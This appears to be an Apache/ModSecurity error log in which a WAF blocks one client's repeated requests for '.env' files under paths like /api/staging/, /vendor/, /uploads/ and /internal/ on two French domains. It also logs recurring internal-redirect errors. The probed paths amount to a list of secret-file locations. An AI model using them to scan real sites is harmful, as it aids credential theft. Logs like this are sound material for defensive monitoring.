[Mon May 11 16:26:14.737211 2026] [security2:error] [pid 1412074:tid 1412090] [client 18.180.54.2:60820] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/api/staging/.env"] [unique_id "agHnBjJnyuKVXoStDha0oAAAAE4"]
[Mon May 11 16:26:14.738074 2026] [core:error] [pid 1412074:tid 1412090] [client 18.180.54.2:60820] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:14.738301 2026] [security2:error] [pid 1412074:tid 1412090] [client 18.180.54.2:60820] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/api/staging/.env"] [unique_id "agHnBjJnyuKVXoStDha0oAAAAE4"]
[Mon May 11 16:26:14.973970 2026] [security2:error] [pid 1411099:tid 1411120] [client 18.180.54.2:60828] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/lib/.env"] [unique_id "agHnBg-Qm4vhlWBPlMi6BgAAABQ"]
[Mon May 11 16:26:14.974232 2026] [security2:error] [pid 1411099:tid 1411120] [client 18.180.54.2:60828] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/lib/.env"] [unique_id "agHnBg-Qm4vhlWBPlMi6BgAAABQ"]
[Mon May 11 16:26:14.974717 2026] [core:error] [pid 1411099:tid 1411120] [client 18.180.54.2:60828] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:14.974865 2026] [security2:error] [pid 1411099:tid 1411120] [client 18.180.54.2:60828] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/lib/.env"] [unique_id "agHnBg-Qm4vhlWBPlMi6BgAAABQ"]
[Mon May 11 16:26:15.435039 2026] [security2:error] [pid 1416109:tid 1416137] [client 18.180.54.2:60836] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/vendor/.env"] [unique_id "agHnB1V4kyjgo4bQBUhUOQAAAMc"]
[Mon May 11 16:26:15.435308 2026] [security2:error] [pid 1416109:tid 1416137] [client 18.180.54.2:60836] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/vendor/.env"] [unique_id "agHnB1V4kyjgo4bQBUhUOQAAAMc"]
[Mon May 11 16:26:15.435838 2026] [core:error] [pid 1416109:tid 1416137] [client 18.180.54.2:60836] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:15.435987 2026] [security2:error] [pid 1416109:tid 1416137] [client 18.180.54.2:60836] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/vendor/.env"] [unique_id "agHnB1V4kyjgo4bQBUhUOQAAAMc"]
[Mon May 11 16:26:15.656130 2026] [security2:error] [pid 1412074:tid 1412091] [client 18.180.54.2:60846] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /resources/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/resources/.env"] [unique_id "agHnBzJnyuKVXoStDha0oQAAAE8"]
[Mon May 11 16:26:15.656398 2026] [security2:error] [pid 1412074:tid 1412091] [client 18.180.54.2:60846] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/resources/.env"] [unique_id "agHnBzJnyuKVXoStDha0oQAAAE8"]
[Mon May 11 16:26:15.656871 2026] [core:error] [pid 1412074:tid 1412091] [client 18.180.54.2:60846] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:15.657021 2026] [security2:error] [pid 1412074:tid 1412091] [client 18.180.54.2:60846] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/resources/.env"] [unique_id "agHnBzJnyuKVXoStDha0oQAAAE8"]
[Mon May 11 16:26:16.160364 2026] [security2:error] [pid 1411201:tid 1411252] [client 18.180.54.2:60862] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/lib/.env"] [unique_id "agHnCPy_GXSWIKeli0vyRQAAAIY"]
[Mon May 11 16:26:16.160561 2026] [security2:error] [pid 1411201:tid 1411252] [client 18.180.54.2:60862] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/lib/.env"] [unique_id "agHnCPy_GXSWIKeli0vyRQAAAIY"]
[Mon May 11 16:26:16.161053 2026] [core:error] [pid 1411201:tid 1411252] [client 18.180.54.2:60862] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:16.161218 2026] [security2:error] [pid 1411201:tid 1411252] [client 18.180.54.2:60862] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/lib/.env"] [unique_id "agHnCPy_GXSWIKeli0vyRQAAAIY"]
[Mon May 11 16:26:16.338374 2026] [security2:error] [pid 1412074:tid 1412093] [client 18.180.54.2:60872] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/assets/.env"] [unique_id "agHnCDJnyuKVXoStDha0ogAAAFE"]
[Mon May 11 16:26:16.338596 2026] [security2:error] [pid 1412074:tid 1412093] [client 18.180.54.2:60872] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/assets/.env"] [unique_id "agHnCDJnyuKVXoStDha0ogAAAFE"]
[Mon May 11 16:26:16.339116 2026] [core:error] [pid 1412074:tid 1412093] [client 18.180.54.2:60872] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:16.339309 2026] [security2:error] [pid 1412074:tid 1412093] [client 18.180.54.2:60872] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/assets/.env"] [unique_id "agHnCDJnyuKVXoStDha0ogAAAFE"]
[Mon May 11 16:26:16.862923 2026] [security2:error] [pid 1411201:tid 1411269] [client 18.180.54.2:60886] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /resources/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/resources/.env"] [unique_id "agHnCPy_GXSWIKeli0vyRgAAAJg"]
[Mon May 11 16:26:16.863143 2026] [security2:error] [pid 1411201:tid 1411269] [client 18.180.54.2:60886] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/resources/.env"] [unique_id "agHnCPy_GXSWIKeli0vyRgAAAJg"]
[Mon May 11 16:26:16.863643 2026] [core:error] [pid 1411201:tid 1411269] [client 18.180.54.2:60886] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:16.863780 2026] [security2:error] [pid 1411201:tid 1411269] [client 18.180.54.2:60886] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/resources/.env"] [unique_id "agHnCPy_GXSWIKeli0vyRgAAAJg"]
[Mon May 11 16:26:17.060885 2026] [security2:error] [pid 1411055:tid 1411076] [client 18.180.54.2:60892] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/uploads/.env"] [unique_id "agHnCUWKUxpmnkK7zHx79AAAARM"]
[Mon May 11 16:26:17.061058 2026] [security2:error] [pid 1411055:tid 1411076] [client 18.180.54.2:60892] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/uploads/.env"] [unique_id "agHnCUWKUxpmnkK7zHx79AAAARM"]
[Mon May 11 16:26:17.061580 2026] [core:error] [pid 1411055:tid 1411076] [client 18.180.54.2:60892] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:17.061754 2026] [security2:error] [pid 1411055:tid 1411076] [client 18.180.54.2:60892] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/uploads/.env"] [unique_id "agHnCUWKUxpmnkK7zHx79AAAARM"]
[Mon May 11 16:26:17.545825 2026] [security2:error] [pid 1411099:tid 1411107] [client 18.180.54.2:60898] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/assets/.env"] [unique_id "agHnCQ-Qm4vhlWBPlMi6CQAAAAY"]
[Mon May 11 16:26:17.546141 2026] [security2:error] [pid 1411099:tid 1411107] [client 18.180.54.2:60898] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/assets/.env"] [unique_id "agHnCQ-Qm4vhlWBPlMi6CQAAAAY"]
[Mon May 11 16:26:17.546753 2026] [core:error] [pid 1411099:tid 1411107] [client 18.180.54.2:60898] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:17.546912 2026] [security2:error] [pid 1411099:tid 1411107] [client 18.180.54.2:60898] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/assets/.env"] [unique_id "agHnCQ-Qm4vhlWBPlMi6CQAAAAY"]
[Mon May 11 16:26:17.797984 2026] [security2:error] [pid 1416109:tid 1416131] [client 18.180.54.2:60900] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /internal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/internal/.env"] [unique_id "agHnCVV4kyjgo4bQBUhUPQAAAME"]
[Mon May 11 16:26:17.798235 2026] [security2:error] [pid 1416109:tid 1416131] [client 18.180.54.2:60900] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/internal/.env"] [unique_id "agHnCVV4kyjgo4bQBUhUPQAAAME"]
[Mon May 11 16:26:17.798769 2026] [core:error] [pid 1416109:tid 1416131] [client 18.180.54.2:60900] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:17.798921 2026] [security2:error] [pid 1416109:tid 1416131] [client 18.180.54.2:60900] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/internal/.env"] [unique_id "agHnCVV4kyjgo4bQBUhUPQAAAME"]
[Mon May 11 16:26:18.225172 2026] [security2:error] [pid 1411055:tid 1411063] [client 18.180.54.2:60914] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/uploads/.env"] [unique_id "agHnCkWKUxpmnkK7zHx79gAAAQY"]
[Mon May 11 16:26:18.225401 2026] [security2:error] [pid 1411055:tid 1411063] [client 18.180.54.2:60914] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/uploads/.env"] [unique_id "agHnCkWKUxpmnkK7zHx79gAAAQY"]
[Mon May 11 16:26:18.225897 2026] [core:error] [pid 1411055:tid 1411063] [client 18.180.54.2:60914] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:18.226059 2026] [security2:error] [pid 1411055:tid 1411063] [client 18.180.54.2:60914] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/uploads/.env"] [unique_id "agHnCkWKUxpmnkK7zHx79gAAAQY"]
[Mon May 11 16:26:18.539545 2026] [security2:error] [pid 1412074:tid 1412086] [client 18.180.54.2:58472] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/tools/.env"] [unique_id "agHnCjJnyuKVXoStDha0pQAAAEo"]
[Mon May 11 16:26:18.539796 2026] [security2:error] [pid 1412074:tid 1412086] [client 18.180.54.2:58472] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/tools/.env"] [unique_id "agHnCjJnyuKVXoStDha0pQAAAEo"]
[Mon May 11 16:26:18.540311 2026] [core:error] [pid 1412074:tid 1412086] [client 18.180.54.2:58472] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:18.540737 2026] [security2:error] [pid 1412074:tid 1412086] [client 18.180.54.2:58472] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/tools/.env"] [unique_id "agHnCjJnyuKVXoStDha0pQAAAEo"]
